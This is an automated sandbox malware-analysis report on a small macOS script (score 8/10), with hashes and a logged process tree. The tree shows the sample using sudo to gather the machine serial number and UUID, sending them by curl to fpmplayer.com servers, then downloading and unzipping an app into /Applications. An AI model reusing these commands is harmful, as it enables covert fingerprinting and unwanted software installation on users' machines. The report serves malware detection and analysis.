4daa2391f425ce6bcd2763a62b0338064b8a5a2aaf541b3046dd9d09265b4d4e

Analysis

max time kernel
146s
max time network
268s
platform
macos_amd64
resource
macos-20220504-en
resource tags

arch:amd64arch:i386image:macos-20220504-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
14/11/2023, 11:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.BC.t_6mcrvu
Size

5KB
MD5

884ac0f5c36a9f038452f570d10cd0be
SHA1

98ecb4792aaf0d13ccd680c46ccb8689ff5bec54
SHA256

4daa2391f425ce6bcd2763a62b0338064b8a5a2aaf541b3046dd9d09265b4d4e
SHA512

17d4137d22ee7097f57324aef0b3e29c0fc63b403b7995490aea4fd5bbc821514fef9a9ba6a6984ee5edf395d9a971fa6a613b58d31e26e9f957f8554e44f27a
SSDEEP

96:zODuLOsgQWi6NttZFwErp9eYrDp5tOJV15t5JF5eMKM/m3wX5tps/df05tjj+W5f:zO6L+QWiatDFwErlB5C5LJ2q5fMdf05n

Score

8^/10

Malware Config

Signatures

Identifies hardware specifics through system_profiler 4 IoCs

ioc	Process
system_profiler SPHardwareDataType	Process not Found
system_profiler SPHardwareDataType	Process not Found
system_profiler SPHardwareDataType	Process not Found
system_profiler SPHardwareDataType	Process not Found

/usr/sbin/spctl
/usr/sbin/spctl --test-devid-status
1⤵
PID:495

/usr/bin/syslog
/usr/bin/syslog -s -k com.apple.message.domain com.apple.security.assessment.current_state com.apple.message.signature "assessments enabled" com.apple.message.signature2 "devid enabled" Message "Gatekeeper state assessments enabled/devid enabled"
1⤵
PID:496

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/.BC.t_6mcrvu\""
1⤵
PID:497

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/.BC.t_6mcrvu\""
1⤵
PID:497

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/.BC.t_6mcrvu\""
1⤵
PID:497

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/.BC.t_6mcrvu
1⤵
PID:497

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/.BC.t_6mcrvu
1⤵
PID:497
- /bin/zsh
  /bin/zsh -c /Users/run/.BC.t_6mcrvu
  2⤵
  PID:510
- /bin/zsh
  /bin/zsh -c /Users/run/.BC.t_6mcrvu
  2⤵
  PID:510
- /Users/run/.BC.t_6mcrvu
  /Users/run/.BC.t_6mcrvu
  2⤵
  PID:510
- /Users/run/.BC.t_6mcrvu
  /Users/run/.BC.t_6mcrvu
  2⤵
  PID:510
- - /usr/bin/sw_vers
    sw_vers -productName
    3⤵
    PID:556
- - /usr/bin/sw_vers
    sw_vers -productName
    3⤵
    PID:556
- - /usr/bin/sw_vers
    sw_vers -productVersion
    3⤵
    PID:557
- - /usr/bin/sw_vers
    sw_vers -productVersion
    3⤵
    PID:557
- - /usr/bin/sudo
    sudo mkdir -p /tmp/FPMPlayer
    3⤵
    PID:558
- - /usr/bin/sudo
    sudo mkdir -p /tmp/FPMPlayer
    3⤵
    PID:558
  - - /bin/mkdir
      mkdir -p /tmp/FPMPlayer
      4⤵
      PID:559
  - - /bin/mkdir
      mkdir -p /tmp/FPMPlayer
      4⤵
      PID:559
- - /usr/bin/curl
    curl --silent --fail --max-time 900 -H "Content-Type: application/json; charset=UTF-8" -X POST -d "{\"model_name\": \"iMac \",\"machine_id\": \"C589348B-0863-5695-96A0-3DAE1B1C0B90\", \"model_identifier\": \"iMac10,1\", \"boot_rom_version\": \"215.0.0.0.0\", \"os\": \"Mac OS X\", \"os_version\": \"10.15.1\", \"serial_number\": \"W80AA98A5PE\"}" https://newapi.fpmplayer.com/ver2/checknew
    3⤵
    PID:560
- - /usr/bin/curl
    curl --silent --fail --max-time 900 -H "Content-Type: application/json; charset=UTF-8" -X POST -d "{\"model_name\": \"iMac \",\"machine_id\": \"C589348B-0863-5695-96A0-3DAE1B1C0B90\", \"model_identifier\": \"iMac10,1\", \"boot_rom_version\": \"215.0.0.0.0\", \"os\": \"Mac OS X\", \"os_version\": \"10.15.1\", \"serial_number\": \"W80AA98A5PE\"}" https://newapi.fpmplayer.com/ver2/checknew
    3⤵
    PID:560
- - /usr/bin/curl
    curl --retry 5 -H "Content-Type: application/json; charset=UTF-8" -X POST -d "{\"event\": \"fpmplayer_pkg_precheck_fail_user\", \"machine_id\": \"C589348B-0863-5695-96A0-3DAE1B1C0B90\", \"url\": \"\", \"os\": \"Mac OS X\", \"os_version\": \"10.15.1\", \"publisher_id\": \"DEFAULT\", \"PAGE_ID\": \"DEFAULT\", \"geo\": \"\", \"sub_id\": \"DEFAULT\"}" https://events.fpmplayer.com/pkg
    3⤵
    PID:561
- - /usr/bin/curl
    curl --retry 5 -H "Content-Type: application/json; charset=UTF-8" -X POST -d "{\"event\": \"fpmplayer_pkg_precheck_fail_user\", \"machine_id\": \"C589348B-0863-5695-96A0-3DAE1B1C0B90\", \"url\": \"\", \"os\": \"Mac OS X\", \"os_version\": \"10.15.1\", \"publisher_id\": \"DEFAULT\", \"PAGE_ID\": \"DEFAULT\", \"geo\": \"\", \"sub_id\": \"DEFAULT\"}" https://events.fpmplayer.com/pkg
    3⤵
    PID:561
- - /usr/bin/sudo
    sudo curl --retry 5 -f https://static.fpmplayer.com/FPMPlayer.app.zip -o /tmp/FPMPlayer/FPMPlayer.app.zip
    3⤵
    PID:567
- - /usr/bin/sudo
    sudo curl --retry 5 -f https://static.fpmplayer.com/FPMPlayer.app.zip -o /tmp/FPMPlayer/FPMPlayer.app.zip
    3⤵
    PID:567
  - - /usr/bin/curl
      curl --retry 5 -f https://static.fpmplayer.com/FPMPlayer.app.zip -o /tmp/FPMPlayer/FPMPlayer.app.zip
      4⤵
      PID:568
  - - /usr/bin/curl
      curl --retry 5 -f https://static.fpmplayer.com/FPMPlayer.app.zip -o /tmp/FPMPlayer/FPMPlayer.app.zip
      4⤵
      PID:568
- - /usr/bin/sudo
    sudo ditto -x -k /tmp/FPMPlayer/FPMPlayer.app.zip /Applications
    3⤵
    PID:576
- - /usr/bin/sudo
    sudo ditto -x -k /tmp/FPMPlayer/FPMPlayer.app.zip /Applications
    3⤵
    PID:576
  - - /usr/bin/ditto
      ditto -x -k /tmp/FPMPlayer/FPMPlayer.app.zip /Applications
      4⤵
      PID:577
  - - /usr/bin/ditto
      ditto -x -k /tmp/FPMPlayer/FPMPlayer.app.zip /Applications
      4⤵
      PID:577
- - /bin/rm
    rm -rf /tmp/FPMPlayer
    3⤵
    PID:578
- - /bin/rm
    rm -rf /tmp/FPMPlayer
    3⤵
    PID:578
- - /usr/bin/curl
    curl --retry 5 -H "Content-Type: application/json; charset=UTF-8" -X POST -d "{\"event\": \"fpmplayer_pkg_install_complete\", \"url\": \"\", \"os\": \"Mac OS X\", \"os_version\": \"10.15.1\", \"machine_id\": \"C589348B-0863-5695-96A0-3DAE1B1C0B90\", \"publisher_id\": \"DEFAULT\", \"PAGE_ID\": \"DEFAULT\", \"geo\": \"\", \"sub_id\": \"DEFAULT\"}" https://events.fpmplayer.com/pkg
    3⤵
    PID:579
- - /usr/bin/curl
    curl --retry 5 -H "Content-Type: application/json; charset=UTF-8" -X POST -d "{\"event\": \"fpmplayer_pkg_install_complete\", \"url\": \"\", \"os\": \"Mac OS X\", \"os_version\": \"10.15.1\", \"machine_id\": \"C589348B-0863-5695-96A0-3DAE1B1C0B90\", \"publisher_id\": \"DEFAULT\", \"PAGE_ID\": \"DEFAULT\", \"geo\": \"\", \"sub_id\": \"DEFAULT\"}" https://events.fpmplayer.com/pkg
    3⤵
    PID:579

/usr/sbin/ioreg
ioreg -ad2 -c IOPlatformExpertDevice
1⤵
PID:512

/usr/sbin/ioreg
ioreg -ad2 -c IOPlatformExpertDevice
1⤵
PID:512

/usr/bin/xmllint
xmllint --xpath "//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()" -
1⤵
PID:513

/usr/bin/xmllint
xmllint --xpath "//key[.=\"IOPlatformUUID\"]/following-sibling::*[1]/text()" -
1⤵
PID:513

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:517

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:517

/usr/bin/awk
awk "/Model Name/ {print \$3 \" \" \$4}"
1⤵
PID:518

/usr/bin/awk
awk "/Model Name/ {print \$3 \" \" \$4}"
1⤵
PID:518

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:526

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:526

/usr/bin/awk
awk "/Model Identifier/ {print \$3}"
1⤵
PID:527

/usr/bin/awk
awk "/Model Identifier/ {print \$3}"
1⤵
PID:527

/usr/bin/xattr
xattr -px com.apple.metadata:kMDItemWhereFroms
1⤵
PID:535

/usr/bin/xattr
xattr -px com.apple.metadata:kMDItemWhereFroms
1⤵
PID:535

/usr/bin/grep
grep -om1 "http.*[^\"]"
1⤵
PID:538

/usr/bin/grep
grep -om1 "http.*[^\"]"
1⤵
PID:538

/usr/bin/plutil
plutil -p -
1⤵
PID:537

/usr/bin/plutil
plutil -p -
1⤵
PID:537

/usr/bin/xxd
xxd -r -p
1⤵
PID:536

/usr/bin/xxd
xxd -r -p
1⤵
PID:536

/usr/bin/sed
sed -e "s/.*pubid=\$[[:alnum:]]*\$.*/\\1/"
1⤵
PID:541

/usr/bin/sed
sed -e "s/.*pubid=\$[[:alnum:]]*\$.*/\\1/"
1⤵
PID:541

/usr/bin/sed
sed -e "s/.*pageid=\$[[:alnum:]]*\$.*/\\1/"
1⤵
PID:544

/usr/bin/sed
sed -e "s/.*pageid=\$[[:alnum:]]*\$.*/\\1/"
1⤵
PID:544

/usr/bin/sed
sed -e "s/.*subid=\$[[:alnum:]]*\$.*/\\1/"
1⤵
PID:547

/usr/bin/sed
sed -e "s/.*subid=\$[[:alnum:]]*\$.*/\\1/"
1⤵
PID:547

/usr/bin/awk
awk "/Boot ROM Version/ {print \$4}"
1⤵
PID:550

/usr/bin/awk
awk "/Boot ROM Version/ {print \$4}"
1⤵
PID:550

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:549

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:549

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:553

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:553

/usr/bin/awk
awk "/Serial Number/ {print \$4}"
1⤵
PID:554

/usr/bin/awk
awk "/Serial Number/ {print \$4}"
1⤵
PID:554

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads